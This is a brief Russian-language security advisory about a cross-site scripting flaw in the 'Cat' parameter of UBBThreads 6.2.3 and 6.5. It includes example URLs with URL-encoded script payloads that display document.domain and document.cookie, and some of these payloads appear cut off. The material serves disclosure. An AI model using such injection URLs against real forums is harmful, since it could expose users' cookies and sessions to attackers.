Программа: UBBThreads 6.2.3, 6.5 

Обнаружено межсайтовое выполнение сценариев в UBBThreads. Удаленный атакующий может получить важные данные пользователей.
Уязвимость существует из-за некорректной фильтрации данных в параметре ‘Cat’. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя. 

Примеры:

[forum]/showflat.php?Cat=document.write(unescape("%3CSCRIPT
%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3C
SCRIPT%3Ealert%28document.cookie%29%3B%3C/SC

[forum]/calendar.php?Cat=document.write(unescape("%3CSCRIPT
%3Ealert%28document.domain%29%3B%3C/SCRIPT%3E%3C
SCRIPT%3Ealert%28document.cookie%29%3B%3C/SC

[forum]/login.php?Cat=[XSS(s.a.)]

[forum]/online.php?Cat=[XSS(s.a.)]



Оставить мнение